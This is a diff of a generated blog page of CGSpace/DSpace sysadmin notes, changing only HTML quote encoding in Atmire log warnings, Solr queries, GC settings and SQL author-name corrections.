2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets

View File

@ -12,11 +12,11 @@
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
Another worrying error from dspace.log is:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -137,11 +137,11 @@ Another worrying error from dspace.log is:
<li>CGSpace was down for five hours in the morning while I was sleeping</li>
<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
</code></pre><ul>
<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
</code></pre><ul>
<li>The first error I see in dspace.log this morning is:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&quot;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&quot;
<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&#34;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&#34;
org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
</code></pre><ul>
<li>Looking through DSpace&rsquo;s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries</li>
<li>The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&quot;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&quot;++AND+subject_mtdt:&quot;PARTNERSHIPS&quot;+AND+subject_mtdt:&quot;RESEARCH&quot;+AND+subject_mtdt:&quot;AGRICULTURE&quot;+AND+subject_mtdt:&quot;DEVELOPMENT&quot;++AND+iso_mtdt:&quot;en&quot;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&#34;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&#34;++AND+subject_mtdt:&#34;PARTNERSHIPS&#34;+AND+subject_mtdt:&#34;RESEARCH&#34;+AND+subject_mtdt:&#34;AGRICULTURE&#34;+AND+subject_mtdt:&#34;DEVELOPMENT&#34;++AND+iso_mtdt:&#34;en&#34;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
2016-12-02 08:28:23,908 INFO org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
</code></pre><ul>
<li>DSpace&rsquo;s own Solr logs don&rsquo;t give IP addresses, so I will have to enable Nginx&rsquo;s logging of <code>/solr</code> so I can see where this request came from</li>
@ -279,7 +279,7 @@ Result = The bitstream could not be found
<li>In other news, I&rsquo;m looking at JVM settings from the Solr 4.10.2 release, from <code>bin/solr.in.sh</code>:</li>
</ul>
<pre tabindex="0"><code># These GC settings have shown to work well for a number of common Solr workloads
GC_TUNE=&quot;-XX:-UseSuperWord \
GC_TUNE=&#34;-XX:-UseSuperWord \
-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
@ -296,7 +296,7 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled \
-XX:+AggressiveOpts&quot;
-XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>I need to try these because they are recommended by the Solr project itself</li>
<li>Also, as always, I need to read <a href="https://wiki.apache.org/solr/ShawnHeisey">Shawn Heisey&rsquo;s wiki page on Solr</a></li>
@ -319,17 +319,17 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
<ul>
<li>Some author authority corrections and name standardizations for Peter:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
UPDATE 11
dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
UPDATE 36
dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
UPDATE 14
dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
dspace=# update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
UPDATE 42
dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
dspace=# update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
UPDATE 360
dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Pay attention to the regex to prevent false positives in tricky cases with Dutch names!</li>
@ -343,7 +343,7 @@ UPDATE 561
<li>The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn&rsquo;t dedicated (also runs Solr, which can benefit from OS cache) so let&rsquo;s try 1024MB</li>
<li>In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):</li>
</ul>
<pre tabindex="0"><code>$ time JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@ -377,30 +377,30 @@ sys 0m22.647s
<li>Querying that ID shows the fields that need to be changed:</li>
</ul>
<pre tabindex="0"><code>{
&quot;responseHeader&quot;: {
&quot;status&quot;: 0,
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;q&quot;: &quot;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;indent&quot;: &quot;true&quot;,
&quot;wt&quot;: &quot;json&quot;,
&quot;_&quot;: &quot;1481102189244&quot;
&#34;responseHeader&#34;: {
&#34;status&#34;: 0,
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;q&#34;: &#34;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;indent&#34;: &#34;true&#34;,
&#34;wt&#34;: &#34;json&#34;,
&#34;_&#34;: &#34;1481102189244&#34;
}
},
&quot;response&quot;: {
&quot;numFound&quot;: 1,
&quot;start&quot;: 0,
&quot;docs&quot;: [
&#34;response&#34;: {
&#34;numFound&#34;: 1,
&#34;start&#34;: 0,
&#34;docs&#34;: [
{
&quot;id&quot;: &quot;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;field&quot;: &quot;dc_contributor_author&quot;,
&quot;value&quot;: &quot;Grace, D.&quot;,
&quot;deleted&quot;: false,
&quot;creation_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;last_modified_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;authority_type&quot;: &quot;person&quot;,
&quot;first_name&quot;: &quot;D.&quot;,
&quot;last_name&quot;: &quot;Grace&quot;
&#34;id&#34;: &#34;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;field&#34;: &#34;dc_contributor_author&#34;,
&#34;value&#34;: &#34;Grace, D.&#34;,
&#34;deleted&#34;: false,
&#34;creation_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;last_modified_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;authority_type&#34;: &#34;person&#34;,
&#34;first_name&#34;: &#34;D.&#34;,
&#34;last_name&#34;: &#34;Grace&#34;
}
]
}
@ -409,51 +409,51 @@ sys 0m22.647s
<li>I think I can just update the <code>value</code>, <code>first_name</code>, and <code>last_name</code> fields&hellip;</li>
<li>The update syntax should be something like this, but I&rsquo;m getting errors from Solr:</li>
</ul>
<pre tabindex="0"><code>$ curl 'localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true' -H 'Content-type:application/json' -d '[{&quot;id&quot;:&quot;1&quot;,&quot;price&quot;:{&quot;set&quot;:100}}]'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true&#39; -H &#39;Content-type:application/json&#39; -d &#39;[{&#34;id&#34;:&#34;1&#34;,&#34;price&#34;:{&#34;set&#34;:100}}]&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:400,
&quot;QTime&quot;:0},
&quot;error&quot;:{
&quot;msg&quot;:&quot;Unexpected character '[' (code 91) in prolog; expected '&lt;'\n at [row,col {unknown-source}]: [1,1]&quot;,
&quot;code&quot;:400}}
&#34;responseHeader&#34;:{
&#34;status&#34;:400,
&#34;QTime&#34;:0},
&#34;error&#34;:{
&#34;msg&#34;:&#34;Unexpected character &#39;[&#39; (code 91) in prolog; expected &#39;&lt;&#39;\n at [row,col {unknown-source}]: [1,1]&#34;,
&#34;code&#34;:400}}
</code></pre><ul>
<li>When I try using the XML format I get an error that the <code>updateLog</code> needs to be configured for that core</li>
<li>Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Then I&rsquo;ll reindex discovery and authority and see how the authority Solr core looks</li>
<li>After this, now there are authorities for some of the &ldquo;Grace, D.&rdquo; and &ldquo;Grace, Delia&rdquo; text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):</li>
</ul>
<pre tabindex="0"><code>$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:0,
&quot;QTime&quot;:0,
&quot;params&quot;:{
&quot;q&quot;:&quot;id:18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;indent&quot;:&quot;true&quot;,
&quot;wt&quot;:&quot;json&quot;}},
&quot;response&quot;:{&quot;numFound&quot;:1,&quot;start&quot;:0,&quot;docs&quot;:[
&#34;responseHeader&#34;:{
&#34;status&#34;:0,
&#34;QTime&#34;:0,
&#34;params&#34;:{
&#34;q&#34;:&#34;id:18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;indent&#34;:&#34;true&#34;,
&#34;wt&#34;:&#34;json&#34;}},
&#34;response&#34;:{&#34;numFound&#34;:1,&#34;start&#34;:0,&#34;docs&#34;:[
{
&quot;id&quot;:&quot;18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;field&quot;:&quot;dc_contributor_author&quot;,
&quot;value&quot;:&quot;Grace, Delia&quot;,
&quot;deleted&quot;:false,
&quot;creation_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;last_modified_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;authority_type&quot;:&quot;person&quot;,
&quot;first_name&quot;:&quot;Delia&quot;,
&quot;last_name&quot;:&quot;Grace&quot;}]
&#34;id&#34;:&#34;18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;field&#34;:&#34;dc_contributor_author&#34;,
&#34;value&#34;:&#34;Grace, Delia&#34;,
&#34;deleted&#34;:false,
&#34;creation_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;last_modified_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;authority_type&#34;:&#34;person&#34;,
&#34;first_name&#34;:&#34;Delia&#34;,
&#34;last_name&#34;:&#34;Grace&#34;}]
}}
</code></pre><ul>
<li>So now I could set them all to this ID and the name would be ok, but there has to be a better way!</li>
<li>In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!</li>
<li>Better to use:</li>
</ul>
<pre tabindex="0"><code>dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace#= update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><ul>
<li>This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!</li>
<li>Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID</li>
@ -461,17 +461,17 @@ UPDATE 561
<li>Deploy &ldquo;take task&rdquo; hack/fix on CGSpace (<a href="https://github.com/ilri/DSpace/pull/290">#290</a>)</li>
<li>I ran the following author corrections and then reindexed discovery:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
